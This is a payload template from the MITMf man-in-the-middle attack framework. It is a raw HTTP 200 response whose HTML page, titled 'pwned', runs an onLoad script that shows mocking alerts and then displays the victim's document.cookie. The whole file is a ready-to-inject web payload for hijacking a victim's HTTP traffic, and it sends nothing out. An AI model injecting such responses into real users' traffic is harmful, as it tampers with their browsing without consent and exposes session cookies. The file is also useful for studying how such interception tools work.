MITMf/config/airpwn_templates/js_html
2014-12-05 04:18:29 +01:00

13 lines
228 B
Text

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html><head><title>pwned</title>
</head><body onLoad="
alert('hi');
alert('you');
alert('are');
alert('so');
alert('owned');
alert('cookie: ' + document.cookie);">